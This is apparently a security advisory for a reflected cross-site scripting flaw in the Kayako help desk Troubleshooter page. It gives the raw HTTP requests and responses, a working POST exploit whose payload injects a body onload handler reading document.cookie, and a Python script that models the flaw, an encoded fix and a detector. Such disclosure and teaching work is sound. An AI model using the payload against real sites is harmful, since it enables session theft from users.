ISACA Journal Vol 1, 2011
Must-read articles

  • A Young Professional’s Guide to Career Success Using Soft Skills
  • Auditing Security Risks in Virtual IT Systems
  • Simplify and Layer Your Security Approach to Protect Card Data
  • JOnline: Auditing Biometrics-based Authentication Systems

Postings with regard to Apache DoS Attack

Kayako Help Desk Software Cross-Site Scripting Vulnerability

Description
Kayako contains an input validation error that makes it vulnerable to cross-site scripting (XSS).

Categories can be created on the Troubleshooter page (by default, "General"), which is accessible to unauthenticated users.
When a user clicks a category, the request below is submitted via HTTP GET.

Original Request
— CUT —
GET /index.php?/Troubleshooter/Step/View/1 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://example.com/index.php?/Troubleshooter/List
Accept-Language: en-us
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: example.com
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%22fy757s2ygz7sssupwrzdutmhqw3voucz%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1306828833%3B%7D; jqCookieJar_options=%7B%7D; SWIFT_sessionid40=fpsq1lzqbr8fenj8ou2t5o9qcm09bp1u; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=fy757s2ygz7sssupwrzdutmhqw3voucz
— CUT END —

Response
— CUT —
<input type="hidden" name="troubleshooterstephistory" value="0" /><input type="hidden" name="isback" id="trisback" value="0" />
— CUT END —

The "troubleshooterstephistory" parameter is reflected into the value attribute of the hidden input without input validation or output encoding, so it is vulnerable to XSS.
Note that the request must be sent via HTTP POST rather than HTTP GET.

Exploit
— CUT —
POST /index.php?/Troubleshooter/Step/View/1 HTTP/1.1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1
Accept-Encoding: gzip,deflate
Keep-Alive: 50
Connection: Keep-Alive
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=kvwgrm3nqrwjhmvfd6y4knn62sap6ohm; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D;

troubleshooterstephistory="><body onload=alert(document.cookie)>&isback=0
— CUT END —

Response
— CUT —
<input type="hidden" name="troubleshooterstephistory" value=""><body onload=alert(document.cookie)>" /><input type="hidden" name="isback" id="trisback" value="0" />
— CUT END —
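As an added example (not part of the advisory and not Kayako's own code), the following Python models the reflection shown above: a hypothetical template that echoes troubleshooterstephistory into the value attribute verbatim, the same template with attribute-context encoding, and a parser check that reports whether the reflected value created any element other than the expected hidden inputs. The form body is constructed here, URL-encoded the way a browser would send the advisory's POST.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Constructed form body mirroring the advisory's POST; the payload is the one
# quoted in the advisory, URL-encoded as a browser would send it.
PAYLOAD = '"><body onload=alert(document.cookie)>'
POST_BODY = urlencode({"troubleshooterstephistory": PAYLOAD, "isback": "0"})


def parse_post(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(params: dict) -> str:
    """Hypothetical stand-in for the template (not Kayako's code): reflects the
    parameter into the value attribute verbatim, the defect the advisory describes."""
    history = params.get("troubleshooterstephistory", "")
    isback = params.get("isback", "0")
    return (f'<input type="hidden" name="troubleshooterstephistory" value="{history}" />'
            f'<input type="hidden" name="isback" id="trisback" value="{isback}" />')


def render_fixed(params: dict) -> str:
    """Same markup, but every reflected value is attribute-context encoded so
    that a double quote cannot close the attribute and < > cannot open a tag."""
    history = escape(params.get("troubleshooterstephistory", ""), quote=True)
    isback = escape(params.get("isback", "0"), quote=True)
    return (f'<input type="hidden" name="troubleshooterstephistory" value="{history}" />'
            f'<input type="hidden" name="isback" id="trisback" value="{isback}" />')


class _TagCollector(HTMLParser):
    """Collects start tags to see which elements a browser would create."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_elements(html: str) -> list:
    """Return every start tag other than the expected hidden inputs; a non-empty
    result means reflected input broke out of the attribute context."""
    collector = _TagCollector()
    collector.feed(html)
    return [(tag, attrs) for tag, attrs in collector.tags if tag != "input"]


if __name__ == "__main__":
    params = parse_post(POST_BODY)
    print(injected_elements(render_vulnerable(params)))  # [('body', {'onload': 'alert(document.cookie)'})]
    print(injected_elements(render_fixed(params)))       # []
```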

Vendor Response
The vendor acknowledged the issue, but no update has been released yet.